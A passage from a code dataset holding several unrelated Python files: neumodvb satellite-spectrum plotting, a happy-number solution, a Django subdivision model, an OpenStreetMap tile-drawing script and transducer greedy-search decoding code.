self.spectrum_graph = self.axes.plot(t, a/1000,label=self.label, color=self.color)\n return True\n\n def annot_size(self):\n s = self.parent.annot_scale_factors\n xlimits, ylimits = self.parent.get_limits()\n sx, sy = s[0] * self.parent.zoom_bandwidth, s[1] * (ylimits[1] - ylimits[0])\n dtdebug(f'annot_size: sx={sx} sy={sy} {xlimits} {ylimits}')\n return sx, sy\n\n def detrend_band(self, spec, lowidx, highidx):\n \"\"\"\n Fit a linear curve to the minima of spectral intervals of the spectrum in spec\n The parameters of the polynomial are fit between lowidx and highidx indices. This allow excluding\n part of the spectrum near 11700Ghz in a KU spectrum. Near that frequency it is difficult to know\n for sure if the spectrum is from the low or high lnb band (which may have an offset in its local\n oscillator)\n \"\"\"\n N = 16\n num_parts = (highidx-lowidx)//N #we split the range between lowidx and highidx in 16 parts\n if num_parts == 0:\n return\n l = num_parts*N\n #t is a list of local minima\n t= self.spec[lowidx:lowidx+l, 1].reshape([-1,num_parts]).min(axis=1)\n #f: corresponding frequencies\n f = self.spec[lowidx:lowidx+l, 0].reshape([-1,num_parts])[:,0]\n\n #compute polynomial fit\n p = np.polyfit(f, t, 1)\n\n #detrend the spectrum\n spec[:,1] -= p[0]*spec[:, 0]+p[1]\n\n def detrend(self):\n lowest_freq, highest_freq = self.spec[0, 0] , self.spec[-1,0]\n # the +8 is a heuristic, in case the highest frequencies of the Ku_low band would exceed 11700 due to lnb lof offset\n has_two_bands = (highest_freq > 11700+8) and (lowest_freq < 11700-8) and \\\n self.spectrum.k.rf_path.lnb.lnb_type == pydevdb.lnb_type_t.UNIV\n if has_two_bands:\n mid_idx1 = np.searchsorted(self.spec[:,0], 11700-8, side='left')\n mid_idx = np.searchsorted(self.spec[mid_idx1:,0], 11700, side='left') + mid_idx1\n mid_idx2 = np.searchsorted(self.spec[mid_idx:,0], 11700+8, side='left') + mid_idx\n self.detrend_band(self.spec[:mid_idx, :], 0, mid_idx1)\n self.detrend_band(self.spec[mid_idx:, :], mid_idx2, self.spec.shape[0])\n else:\n self.detrend_band(self.spec, 0, self.spec.shape[0])\n\n def ann_tps(self, tpsk, spec, offset=-64, xoffset=0):\n self.annots =[]\n if len(tpsk) == 0:\n return\n f = tpsk[:,0]\n #setting this is needed to calibrate coordinate system\n l = np.min(spec[0,0])\n r = np.max(spec[-1,0])\n w, h = self.annot_size() # un units of Mhz and dB\n xscale = (len(spec[:,0])-1)/(r - l)\n\n n = len(spec[:,0])\n w = int(w)\n idxs = np.searchsorted(spec[:,0], f, side='left')\n offset = h*1.5*1000\n self.pol = enum_to_str (self.spectrum.k.pol)\n annoty, lrflag = pyspectrum.find_annot_locations(spec[:,1], idxs, f, #f only used for debugging\n int(w*xscale), int(h*2*1000),\n offset)\n self.annot_maxy = annoty.max()/1000\n annoty /= 1000\n hlines = []\n yoffset1 = h\n yoffset2 = 2\n sig = (spec[idxs,1])/1000 + yoffset1\n vline_top = []\n bbs =[]\n for ay, s, flag, tp in zip(annoty, sig, lrflag, self.tps):\n pt=[tp.freq, s]\n pttext=[tp.freq + (0 if flag else w/10), ay]\n xoffset = 0\n txt = f\"{tp.freq:8.3f}{self.pol} {int(tp.symbol_rate)}kS/s \" if (flag & 2) \\\n else f\"{tp.freq:8.3f}{self.pol} \\n{int(tp.symbol_rate)}kS/s \";\n annot=self.axes.annotate(txt, \\\n pt, xytext=pttext, xycoords='data', \\\n ha='right' if (flag & 1) else 'left', fontsize=8)\n annot.tp = tp\n annot.set_picker(True) # Enable picking on the legend line.\n self.annots.append(annot)\n self.vlines = self.axes.vlines(f, sig, annoty+h/2, color='black')\n self.vlines.set_picker(True) # Enable picking on the legend line.\n bw = tpsk[:,1]/2000000\n self.hlines = self.axes.hlines(sig, f-bw, f+bw, color=self.color)\n self.hlines.set_picker(True) # Enable picking on the legend line.\n\n\n def process(self, specname, tpsname):\n if not self.plot_spec(specname):\n self.spectrum_graph = None\n return False\n frequency_step = round(1000*(self.spec[1:,0] - self.spec[:-1,0]).mean())\n sig = self.spec[:,1]\n self.make_tps(tpsname)\n\n #set xlimits prior to annotation to ensure the computation\n #which prevents annotations from overlapping has the proper coordinate system\n self.xlimits = int(self.spec[0,0]), int(self.spec[-1,0])\n self.ylimits = [np.min(self.spec[:,1])/1000, np.max(self.spec[:,1])/1000]\n xlimits, ylimits = self.parent.get_limits() #takes into account all spectra\n\n if ylimits[1] != ylimits[0]:\n self.axes.set_ylim(ylimits)\n self.axes.set_xlim(xlimits)\n\n self.ann_tps(self.peak_data, self.spec)\n\n #set final limits\n self.xlimits = (int(self.spec[0,0]), int(self.spec[-1,0] ))\n self.ylimits = (ylimits[0], ylimits[1] if self.annot_maxy is None else self.annot_maxy )\n self.parent.get_limits.cache_clear() #needs update!\n self.ylimits = (self.ylimits[0], min(self.ylimits[1], self.ylimits[0]+30))\n xlimits, ylimits = self.parent.get_limits()\n\n self.axes.set_ylim(ylimits)\n self.axes.set_xlim(xlimits)\n return True\n\nclass SpectrumPlot(wx.Panel):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(parent, *args, **kwargs)\n self.xlimits = None\n self.ylimits = None\n self.zoom_bandwidth=500 #zoom all graphs to this amount of spectrum, to avoid overlapping annotations\n self.parent = parent\n self.spectrum = pystatdb.spectrum.spectrum()\n self.scrollbar = wx.ScrollBar(self)\n self.scrollbar.SetScrollbar(0, self.zoom_bandwidth, 2100, 200)\n self.scrollbar.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll)\n\n self.figure = mpl.figure.Figure()\n self.axes = self.figure.add_subplot(111)\n self.canvas = FigureCanvas(self, -1, self.figure)\n self.toolbar_sizer = wx.BoxSizer(wx.HORIZONTAL)\n #self.toolbar_sizer = wx.FlexGridSizer(1, 4, 0, 10)\n self.toolbar = NavigationToolbar(self.canvas)\n self.toolbar.Realize()\n self.toolbar_sizer.Add(self.toolbar, 0, wx.LEFT | wx.EXPAND)\n\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.toolbar_sizer, 0, wx.LEFT | wx.EXPAND)\n\n self.sizer.Add(self.canvas, proportion=1,\n flag=wx.LEFT | wx.TOP | wx.EXPAND)\n self.sizer.Add(self.scrollbar, proportion=0,\n flag=wx.LEFT | wx.TOP | wx.EXPAND)\n self.SetSizer(self.sizer)\n self.Bind (wx.EVT_WINDOW_CREATE, self.OnWindowCreate)\n self.Parent.Bind (wx.EVT_SHOW, self.OnShowHide)\n self.count =0\n from collections import OrderedDict\n self.spectra = OrderedDict()\n self.legend = None\n self.figure.canvas.mpl_connect('pick_event', self.on_pick)\n self.figure.canvas.mpl_connect('button_press_event', self.on_button_press)\n self.shift_is_held = False\n self.ctrl_is_held = False\n #self.figure.canvas.mpl_connect('key_press_event', self.set_modifiers)\n #self.figure.canvas.mpl_connect('key_release_event', self.unset_modifiers)\n self.cycle_colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n self.current_annot = None #currently selected annot\n self.current_annot_vline = None\n self.do_detrend = True\n self.pan_start_freq = None\n self.add_detrend_button()\n self.add_status_box()\n self.mux_creator = None\n wx.CallAfter(self.compute_annot_scale_factors)\n\n def add_drawn_mux(self, freq, pol, symbol_rate):\n txt = f\"{freq:8.3f}{pol} {int(symbol_rate)}kS/s \"\n dtdebug(f'Add drawn mux {txt}')\n wx.CallAfter(self.parent.OnUpdateMux, freq, pol, symbol_rate)\n\n def start_draw_mux(self, default_pol):\n if self.mux_creator is not None:\n self.mux_creator.show()\n return\n from neumodvb.draw_mux import MuxSelector\n self.mux_creator = MuxSelector(self, pol=default_pol)\n\n def set_modifiers(self, event):\n if 'shift' in event.key:\n self.shift_is_held = True\n if 'control' in event.key:\n self.ctrl_is_held = True\n def unset_modifiers(self, event):\n if 'shift' in event.key:\n self.shift_is_held = False\n if 'control' in event.key:\n self.ctrl_is_held = False\n\n def on_motion(self, event):\n pass\n\n def OnShowHide(self,event):\n if event.IsShown():\n self.draw()\n\n def OnWindowCreate(self,event):\n if event.GetWindow() == self:\n #self.start_freq, self.end_freq = self.parent.start_freq, self.parent.end_freq\n self.draw()\n else:\n pass\n\n def OnScroll(self, event):\n pos = event.GetPosition()\n offset =pos\n self.pan_spectrum(offset)\n\n def OnFix(self, event):\n self.adjust()\n self.canvas.draw()\n\n def draw(self):\n self.axes.clear()\n self.Fit()\n self.figure.subplots_adjust(left=0.05, bottom=0.1, right=0.98, top=0.92)\n self.axes.spines['right'].set_visible(False)\n self.axes.spines['top'].set_visible(False)\n self.axes.set_ylabel('dB')\n self.axes.set_xlabel('Frequency (Mhz)')\n xlimits, ylimits = self.get_limits()\n self.axes.set_xlim(xlimits)\n self.canvas.draw()\n\n def add_detrend_button(self) :\n panel = wx.Panel(self, wx.ID_ANY, style=wx.BORDER_SUNKEN)\n self.toolbar_sizer.Add(panel, 0, wx.LEFT|wx.RIGHT, 10)\n sizer = wx.FlexGridSizer(3, 1, 0)\n bitmap = wx.ArtProvider.GetBitmap(wx.ART_DEL_BOOKMARK, size=(16, 16))\n button = wx.BitmapToggleButton(panel, wx.ID_ANY, label=bitmap)\n button.SetValue(self.do_detrend)\n sizer.Add(button, 1, wx.ALIGN_CENTER_VERTICAL, border=0)\n panel.SetSizer(sizer)\n self.Bind(wx.EVT_TOGGLEBUTTON, self.OnToggleDetrend, button)\n\n def add_status_box(self) :\n self.status_box = wx.StaticText(self, -1)\n self.toolbar_sizer.Add(self.status_box, 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER|wx.EXPAND, 10)\n self.canvas.mpl_connect('motion_notify_event', self.UpdateStatusBar)\n self.canvas.Bind(wx.EVT_ENTER_WINDOW, self.ChangeCursor)\n\n def ChangeCursor(self, event):\n self.canvas.SetCursor(wx.Cursor(wx.CURSOR_CROSS))\n\n def UpdateStatusBar(self, event):\n if event.inaxes:\n self.status_box.SetLabel(\n f\"{event.xdata:3.3f}Mhz\\n{event.ydata:2.1f}dB\")\n\n def add_legend_button(self, spectrum, color) :\n panel = wx.Panel(self, wx.ID_ANY, style=wx.BORDER_SUNKEN)\n self.toolbar_sizer.Add(panel, 0, wx.LEFT|wx.RIGHT, 10)\n sizer = wx.FlexGridSizer(3, 1, 0)\n static_line = wx.StaticLine(panel, wx.ID_ANY)\n static_line.SetMinSize((20, 2))\n static_line.SetBackgroundColour(wx.Colour(color))\n static_line.SetForegroundColour(wx.Colour(color))\n\n sizer.Add(static_line, 1, wx.ALIGN_CENTER_VERTICAL, 0)\n\n button = wx.ToggleButton(panel, wx.ID_ANY, _(spectrum.label))\n sizer.Add(button, 0, 0, 0)\n button.spectrum = spectrum\n button.SetValue(1)\n\n self.close_button = wx.Button(panel, -1, \"\", style=wx.BU_NOTEXT)\n self.close_button.SetMinSize((32, -1))\n self.close_button.SetBitmap(wx.ArtProvider.GetBitmap(wx.ART_CLOSE, wx.ART_OTHER, (16, 16)))\n self.close_button.spectrum = spectrum\n sizer.Add(self.close_button, 0, 0, 0)\n\n panel.SetSizer(sizer)\n\n self.Bind(wx.EVT_TOGGLEBUTTON, self.OnToggleAnnots, button)\n self.Bind(wx.EVT_BUTTON, self.OnCloseGraph, self.close_button)\n self.Layout()\n spectrum.legend_panel = panel\n\n def make_key(self, spectrum):\n return str(spectrum.k)\n\n def toggle_spectrum(self, spectrum):\n key = self.make_key(spectrum)\n s = self.spectra.get(key, None)\n if s is None:\n self.show_spectrum(spectrum)\n else:\n self.hide_spectrum(spectrum)\n\n self.canvas.draw()\n wx.CallAfter(self.parent.Refresh)\n\n return False\n\n def compute_annot_scale_factors(self):\n \"\"\"\n computes self.annot_scale_factors\n when these are multiplied by the x and y limits of the the graph\n we will get the correct bounding box of double line annotions\n \"\"\"\n r = self.figure.canvas.get_renderer()\n x = self.zoom_bandwidth\n y = 80*2\n self.axes.set_xlim([0, x ])\n self.axes.set_ylim([0, y ])\n t = self.axes.text(100, 10, '10841.660V/H \\n10841.660V/H ', fontsize=8)\n bb = t.get_window_extent(r).transformed(self.axes.transData.inverted())\n self.annot_scale_factors = [(bb.x1-bb.x0)/x, (bb.y1-bb.y0)/y]\n self.annot_bbox = bb\n t.remove()\n\n def show_spectrum(self, spectrum):\n key = self.make_key(spectrum)\n s = self.spectra.get(key, None)\n if s is not None:\n self.hide_spectrum(spectrum)\n is_first = False\n else:\n is_first = len(self.spectra)==0\n self.get_limits.cache_clear()\n s = Spectrum(self, spectrum, color=self.cycle_colors[len(self.spectra)])\n self.spectra[key] = s\n self.add_legend_button(s, s.color)\n if not s.show():\n return\n if self.legend is not None:\n self.legend.remove()\n #self.pan_spectrum(0)\n self.pan_band(s.spec[0,0])\n xlimits, ylimits = self.get_limits()\n offset = 0 if self.pan_start_freq is None else self.pan_start_freq - xlimits[0]\n\n self.scrollbar.SetScrollbar(offset, self.zoom_bandwidth, xlimits[1] - xlimits[0], 200)\n self.canvas.draw()\n wx.CallAfter(self.parent.Refresh)\n\n def pan_spectrum(self, offset):\n xlimits, _ = self.get_limits()\n xmin = xlimits[0]+offset\n xmax = xmin +self.zoom_bandwidth\n self.pan_start_freq = xmin\n self.axes.set_xbound((xmin, xmax))\n self.canvas.draw()\n self.parent.Refresh()\n\n def pan_band(self, start):\n xmin, ymin = start, -50\n xmax, ymax = start + self.zoom_bandwidth, -45\n self.axes.set_xbound((xmin, xmax))\n self.canvas.draw()\n self.parent.Refresh()\n\n def hide_spectrum(self, spectrum):\n key = self.make_key(spectrum)\n s = self.spectra.get(key, None)\n if s is None:\n return\n s.legend_panel.Destroy()\n self.toolbar_sizer.Layout()\n s.clear()\n del self.spectra[key]\n if self.legend is not None:\n self.legend.remove()\n\n @lru_cache(maxsize=None)\n def get_limits(self):\n if self.spectra is None or len(self.spectra)==0:\n return ((self.parent.start_freq/1000, self.parent.end_freq/1000), (-60.0, -40.0))\n xlimits, ylimits = None, None\n for spectrum in self.spectra.values():\n xlimits = combine_ranges(xlimits, spectrum.xlimits)\n ylimits = combine_ranges(ylimits, spectrum.ylimits)\n #-100 and +100 to allow offscreen annotations to be seen\n return (xlimits[0] - 100 , xlimits[1] +100), ylimits\n\n def update_matplotlib_legend(self, spectrum):\n self.legend = self.figure.legend(ncol=len(self.spectra))\n\n for legline, key in zip(self.legend.get_lines(), self.spectra):\n legline.set_picker(True) # Enable picking on the legend line.\n legline.key = key\n\n def on_pickSHOWHIDE(self, event):\n \"\"\"\n show/hide graph by clicking on legend line\n \"\"\"\n # On the pick event, find the original line corresponding to the legend\n # proxy line, and toggle its visibility.\n legline = event.artist\n key = legline.key\n dtdebug(f\"toggling {key} for {legline}\")\n origline = self.spectra[key].spectrum_graph[0]\n visible = not origline.get_visible()\n origline.set_visible(visible)\n # Change the alpha on the line in the legend so we can see what lines\n # have been toggled.\n legline.set_alpha(1.0 if visible else 0.2)\n self.figure.canvas.draw()\n\n def set_current_annot(self, annot):\n if annot == self.current_annot:\n return\n if self.current_annot is not None:\n if self.current_annot.tp.scan_ok:\n color = 'green'\n elif self.current_annot.tp.scan_failed:\n color = 'red'\n else:\n color ='black'\n self.current_annot.set_color(color)\n color = 'blue'\n annot.set_color(color)\n if self.current_annot_vline is not None:\n self.current_annot_vline.remove()\n self.current_annot_vline = self.axes.axvline(x=annot.tp.freq, color='blue')\n self.current_annot = annot\n self.canvas.draw()\n\n def set_annot_status_(self, annot, peak, mux, locked):\n if annot is None:\n assert False\n return\n freq, symbol_rate = mux.frequency/1000, int(mux.symbol_rate/1000),\n annot.set_text(f\"{freq:8.3f}{enum_to_str(mux.pol)} \\n{symbol_rate}kS/s \")\n annot.tp.scan_ok = locked\n annot.tp.scan_failed = not locked\n color = 'green' if locked else 'red'\n annot.set_color(color)\n self.canvas.draw()\n\n def set_annot_status(self, spectrum_key, peak, mux, locked):\n key = str(spectrum_key)\n spectrum = self.spectra[key]\n annot = spectrum.annot_for_peak(peak)\n if annot is None:\n assert False\n return\n self.set_annot_status_(annot, peak, mux, locked)\n\n def set_current_annot_status(self, mux, si_or_driver_mux, locked):\n if self.current_annot is None:\n return\n annot = self.current_annot\n if abs(annot.tp.freq*1000 - si_or_driver_mux.frequency) >= 0.2 * annot.tp.symbol_rate \\\n or enum_to_str(si_or_driver_mux.pol) != annot.tp.spectrum.pol:\n return\n self.set_annot_status_(self.current_annot, mux, si_or_driver_mux, locked)\n\n def reset_current_annot_status(self, mux):\n if self.current_annot is None:\n return\n spectrum = self.current_annot.tp.spectrum\n if spectrum.annot_for_peak(mux) != self.current_annot:\n return\n self.current_annot.tp.scan_ok = False\n self.current_annot.tp.scan_failed = False\n color = 'blue'\n self.current_annot.set_color(color)\n self.canvas.draw()\n\n def set_current_tp(self, tp):\n \"\"\"\n Highlight current tp\n \"\"\"\n # On the pick event, find the original line corresponding to the legend\n # proxy line, and toggle its visibility.\n for annot in tp.spectrum.annots:\n if annot.tp == tp:\n dtdebug(f'set current_tp: spec={tp.spectrum} tp={annot.tp}')\n self.set_current_annot(annot)\n return\n def on_button_press(self, event):\n pass\n\n def on_pick(self, event):\n \"\"\"\n show/hide graph by clicking on legend line\n \"\"\"\n # On the pick event, find the original line corresponding to the legend\n # proxy line, and toggle its visibility.\n what = event.artist\n for key,spectrum in self.spectra.items():\n if what in spectrum.annots:\n dtdebug(f'Spectrum: pick annot {spectrum} tp={what.tp}')\n #import pdb; pdb.set_trace()\n self.set_current_annot(what)\n wx.CallAfter(self.parent.OnSelectMux, what.tp)\n return\n me = event.mouseevent\n freq = me.xdata\n best_delta = 20000000\n best_annot = None\n dtdebug(f\"Spectrum: pick freq={freq}\")\n for key,spectrum in self.spectra.items():\n if what == spectrum.hlines or what == spectrum.vlines:\n ind = event.ind[0]\n verts = what.get_paths()[ind].vertices\n f = (verts[1, 0] + verts[0, 0])/2\n annot, delta = spectrum.annot_for_freq(freq)\n if delta < best_delta:\n best_delta = delta\n best_annot = annot\n\n if best_annot is not None:\n dtdebug(f'Spectrum: pick line spectrum={spectrum} tp={best_annot.tp}')\n self.set_current_annot(best_annot)\n wx.CallAfter(self.parent.OnSelectMux, best_annot.tp)\n return\n\n def OnCloseGraph(self, evt):\n spectrum = evt.GetEventObject().spectrum.spectrum\n self.hide_spectrum(spectrum)\n self.canvas.draw()\n self.parent.Refresh()\n\n def OnToggleAnnots(self, evt):\n spectrum = evt.GetEventObject().spectrum\n if False:\n if spectrum.spectrum_graph is not None:\n origline = spectrum.spectrum_graph[0]\n visible = not origline.get_visible()\n origline.set_visible(visible)\n\n if spectrum.hlines is not None:\n visible = not spectrum.hlines.get_visible()\n spectrum.hlines.set_visible(visible)\n\n if spectrum.vlines is not None:\n visible = not spectrum.vlines.get_visible()\n spectrum.vlines.set_visible(visible)\n\n for a in spectrum.annots:\n visible = not a.get_visible()\n a.set_visible(visible)\n\n\n self.figure.canvas.draw()\n self.parent.Refresh()\n\n def OnToggleDetrend(self, evt):\n self.do_detrend = evt.GetEventObject().GetValue()\n spectra = []\n for key,spectrum in self.spectra.items():\n spectra.append(spectrum.spectrum)\n for spectrum in spectra:\n self.hide_spectrum(spectrum)\n for spectrum in spectra:\n self.show_spectrum(spectrum)\n self.figure.canvas.draw()\n self.parent.Refresh()\n\n\n\"\"\"\nsolution to layout text boxes (freq,pol,symrate) suhc that they do not overlap with the vertical lines\npointing to spectral peaks, the horizontal lines describing bandwidth, and the curve itself\n-boxes are either left aligned and then start at the vertical line, or rigth aligned and then end\n at the vertical line\n\n-step 1 is to compute a baseline version which is above the curve and horizontal lines, has only left aligned text\n but can have overlap between boxes\n\n-step 2 is to compute two overlap-free versions:\n--2.a \"increasing\" version in which all boxes are right aligned and overlapping\n boxes are moved above their left neighbor. This requires a single pass over the data\n--2.b \"decreasing\" version in which all boxes are left aligned and overlapping\n boxes are moved above their right neighbor. This requires a single pass over the data (but starting from the end)\n\n-step 3 is to merge the increasing and decreasing versions as follows:\n--start at the left wit the version having the lowest height; call this \"current\" version\n--skip to the next (right) element. when the alternate version would be lower than the current version, attempt to\n switch version as follows (if switching is not possible, simply keep the current version)\n -switching from increasing to decreasing is always allowed as it creates no additional conflict (if the\n left element was increasing, it was right aligned and cannot cause overlap with the right element, which is\n left aligned in this case)\n -switching from decreasing to increasing is allowed only the the current element will not overlap with the increasing\n (=left aligned) version of its right neighbor. This means that swicthing will only be allowed between sepearated clusters\n of overlapping elements.\n\n\n\"\"\"\n","repo_name":"deeptho/neumodvb","sub_path":"gui/neumodvb/neumoplot.py","file_name":"neumoplot.py","file_ext":"py","file_size_in_byte":33857,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"70314932214","text":"# Happy Number\nclass Solution:\n def calcHappy(self, num) -> int:\n sam = rem = 0\n while(num > 0):\n rem = num % 10 # remainder\n sam = sam + (rem*rem)\n num = num//10 # divider\n return sam\n\n def isHappy(self, n: int) -> bool:\n nam = 0\n nam = self.calcHappy(n)\n while (nam != 1 and nam != 4):\n nam = self.calcHappy(nam)\n if nam == 1:\n return True\n elif nam == 4:\n return False\n # print(self.calcHappy(n))\n","repo_name":"Azjargal13/lc-notes-codes","sub_path":"30days-challenge/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2373707591","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator\n\nfrom common.models import BaseModel\n\n\nclass Subdivision(BaseModel):\n code = models.CharField(max_length=4, verbose_name=\"Код\")\n name = models.CharField(\n verbose_name=\"Название Подразделения\",\n max_length=35,\n null=True,\n blank=True,\n )\n phone = models.CharField(\n verbose_name=\"Телефон\",\n max_length=10,\n null=True,\n blank=True,\n )\n chief = models.CharField(\n verbose_name=\"Начальник Подразделения\",\n max_length=35,\n null=True,\n blank=True,\n )\n percent_city = models.IntegerField(\n verbose_name=\"Процент города\",\n validators=[MaxValueValidator(99)],\n null=True,\n blank=True,\n )\n parent = models.ForeignKey(\n \"self\",\n null=True,\n blank=True,\n on_delete=models.CASCADE\n )\n\n def __str__(self) -> str:\n return str(self.name)\n\n class Meta:\n verbose_name = \"Подразделение-владелец транспорта\"\n verbose_name_plural = \"Подразделения-владельцы транспорта\"\n","repo_name":"redbird504/fms_backend","sub_path":"src/vehicles/models/subdivision.py","file_name":"subdivision.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35084112880","text":"import io\nimport math\nimport random\n\nimport mercantile\nimport requests\nfrom bs4 import BeautifulSoup as Bs\nfrom cairo import ImageSurface, FORMAT_ARGB32, Context\n\n\ndef get_map(west, south, east, north, zoom):\n tiles = list(mercantile.tiles(west, south, east, north, zoom))\n\n min_x = min([t.x for t in tiles])\n min_y = min([t.y for t in tiles])\n max_x = max([t.x for t in tiles])\n max_y = max([t.y for t in tiles])\n\n tile_size = (256, 256)\n\n map_image = ImageSurface(FORMAT_ARGB32, tile_size[0] * (max_x - min_x + 1), tile_size[1] * (max_y - min_y + 1))\n ctx = Context(map_image)\n\n for t in tiles:\n server = random.choice(['a', 'b', 'c'])\n url = 'http://{server}.tile.openstreetmap.org/{zoom}/{x}/{y}.png'.format(server=server, zoom=t.z, x=t.x, y=t.y)\n response = requests.get(url)\n img = ImageSurface.create_from_png(io.BytesIO(response.content))\n\n ctx.set_source_surface(img, (t.x - min_x) * tile_size[0], (t.y - min_y) * tile_size[0])\n ctx.paint()\n\n bounds = {\n \"left\": min([mercantile.xy_bounds(t).left for t in tiles]),\n \"right\": max([mercantile.xy_bounds(t).right for t in tiles]),\n \"bottom\": min([mercantile.xy_bounds(t).bottom for t in tiles]),\n \"top\": max([mercantile.xy_bounds(t).top for t in tiles]),\n }\n\n kx = map_image.get_width() / (bounds['right'] - bounds['left'])\n ky = map_image.get_height() / (bounds['top'] - bounds['bottom'])\n\n left_top = mercantile.xy(west, north)\n right_bottom = mercantile.xy(east, south)\n offset_left = (left_top[0] - bounds['left']) * kx\n offset_top = (bounds['top'] - left_top[1]) * ky\n offset_right = (bounds['right'] - right_bottom[0]) * kx\n offset_bottom = (right_bottom[1] - bounds['bottom']) * ky\n\n map_image_clipped = ImageSurface(FORMAT_ARGB32, map_image.get_width() - int(offset_left + offset_right),\n map_image.get_height() - int(offset_top + offset_bottom))\n\n ctx = Context(map_image_clipped)\n ctx.set_source_surface(map_image, -offset_left, -offset_top)\n ctx.paint()\n return map_image_clipped\n\n\ndef transform_coords(map_img: ImageSurface, coords, lon, lat):\n west, south, north, east = coords\n\n left_top = mercantile.xy(west, north)\n right_bottom = mercantile.xy(east, south)\n\n kx = map_img.get_width() / (right_bottom[0] - left_top[0])\n ky = map_img.get_height() / (right_bottom[1] - left_top[1])\n\n x, y = mercantile.xy(lon, lat)\n\n x = (x - left_top[0]) * kx\n y = (y - left_top[1]) * ky\n return x, y\n\n\ndef draw(bbox, nodes, output_filename=\"data/map.png\"):\n south, west, north, east = bbox\n zoom = 15\n\n map_image = get_map(west, south, east, north, zoom)\n\n ctx = Context(map_image)\n for node_x, node_y in nodes:\n node_x, node_y = float(node_x), float(node_y)\n x, y = transform_coords(map_image, [west, south, north, east], node_x, node_y)\n ctx.set_source_rgb(255, 0, 0)\n ctx.arc(x, y, 3, 0, 2 * math.pi)\n ctx.stroke()\n\n with open(output_filename, \"wb\") as f:\n map_image.write_to_png(f)\n","repo_name":"Krayushkin68/GEO_analyze","sub_path":"pygeoanalyze/draw_map.py","file_name":"draw_map.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29039491982","text":"import math\nfrom typing import List\nimport torch\n\nfrom aural.modeling.post.beamsearch import greedy_search\nfrom torch.nn.utils.rnn import pad_sequence\nfrom alfred import device\n\n\ndef greedy_search_single_batch(\n model, encoder_out: torch.Tensor, max_sym_per_frame: int=1\n) -> List[int]:\n \"\"\"Greedy search for a single utterance.\n Args:\n model:\n An instance of `Transducer`.\n encoder_out:\n A tensor of shape (N, T, C) from the encoder. Support only N==1 for now.\n max_sym_per_frame:\n Maximum number of symbols per frame. If it is set to 0, the WER\n would be 100%.\n Returns:\n Return the decoded result.\n \"\"\"\n assert encoder_out.ndim == 3\n # support only batch_size == 1 for now\n assert encoder_out.size(0) == 1, encoder_out.size(0)\n\n blank_id = model.decoder.blank_id\n context_size = model.decoder.context_size\n unk_id = getattr(model, \"unk_id\", blank_id)\n\n device = next(model.parameters()).device\n decoder_input = torch.tensor(\n [blank_id] * context_size, device=device, dtype=torch.int64\n ).reshape(1, context_size)\n\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n encoder_out = model.joiner.encoder_proj(encoder_out)\n\n T = encoder_out.size(1)\n t = 0\n hyp = [blank_id] * context_size\n\n # Maximum symbols per utterance.\n max_sym_per_utt = 1000\n # symbols per frame\n sym_per_frame = 0\n # symbols per utterance decoded so far\n sym_per_utt = 0\n\n while t < T and sym_per_utt < max_sym_per_utt:\n if sym_per_frame >= max_sym_per_frame:\n sym_per_frame = 0\n t += 1\n continue\n # fmt: off\n current_encoder_out = encoder_out[:, t:t+1, :].unsqueeze(2)\n logits = model.joiner(\n current_encoder_out, decoder_out.unsqueeze(1), project_input=False\n )\n # logits is (1, 1, 1, vocab_size)\n y = logits.argmax().item()\n if y not in (blank_id, unk_id):\n hyp.append(y)\n decoder_input = torch.tensor([hyp[-context_size:]], device=device).reshape(\n 1, context_size\n )\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n\n sym_per_utt += 1\n sym_per_frame += 1\n else:\n sym_per_frame = 0\n t += 1\n hyp = hyp[context_size:] # remove blanks\n return hyp\n\n\ndef greedy_search_batch(\n model,\n encoder_out: torch.Tensor,\n encoder_out_lens: torch.Tensor,\n) -> List[List[int]]:\n assert encoder_out.ndim == 3\n assert encoder_out.size(0) >= 1, encoder_out.size(0)\n\n packed_encoder_out = torch.nn.utils.rnn.pack_padded_sequence(\n input=encoder_out,\n lengths=encoder_out_lens.cpu(),\n batch_first=True,\n enforce_sorted=False,\n )\n device = next(model.parameters()).device\n blank_id = model.decoder.blank_id\n unk_id = getattr(model, \"unk_id\", blank_id)\n context_size = model.decoder.context_size\n\n batch_size_list = packed_encoder_out.batch_sizes.tolist()\n N = encoder_out.size(0)\n assert torch.all(encoder_out_lens > 0), encoder_out_lens\n assert N == batch_size_list[0], (N, batch_size_list)\n\n hyps = [[blank_id] * context_size for _ in range(N)]\n\n decoder_input = torch.tensor(\n hyps,\n device=device,\n dtype=torch.int64,\n ) # (N, context_size)\n\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n encoder_out = model.joiner.encoder_proj(packed_encoder_out.data)\n\n offset = 0\n for batch_size in batch_size_list:\n start = offset\n end = offset + batch_size\n current_encoder_out = encoder_out.data[start:end]\n current_encoder_out = current_encoder_out.unsqueeze(1).unsqueeze(1)\n # current_encoder_out's shape: (batch_size, 1, 1, encoder_out_dim)\n offset = end\n decoder_out = decoder_out[:batch_size]\n\n logits = model.joiner(\n current_encoder_out, decoder_out.unsqueeze(1), project_input=False\n )\n # logits'shape (batch_size, 1, 1, vocab_size)\n logits = logits.squeeze(1).squeeze(1) # (batch_size, vocab_size)\n assert logits.ndim == 2, logits.shape\n y = logits.argmax(dim=1).tolist()\n emitted = False\n for i, v in enumerate(y):\n if v not in (blank_id, unk_id):\n hyps[i].append(v)\n emitted = True\n if emitted:\n # update decoder output\n decoder_input = [h[-context_size:] for h in hyps[:batch_size]]\n decoder_input = torch.tensor(\n decoder_input,\n device=device,\n dtype=torch.int64,\n 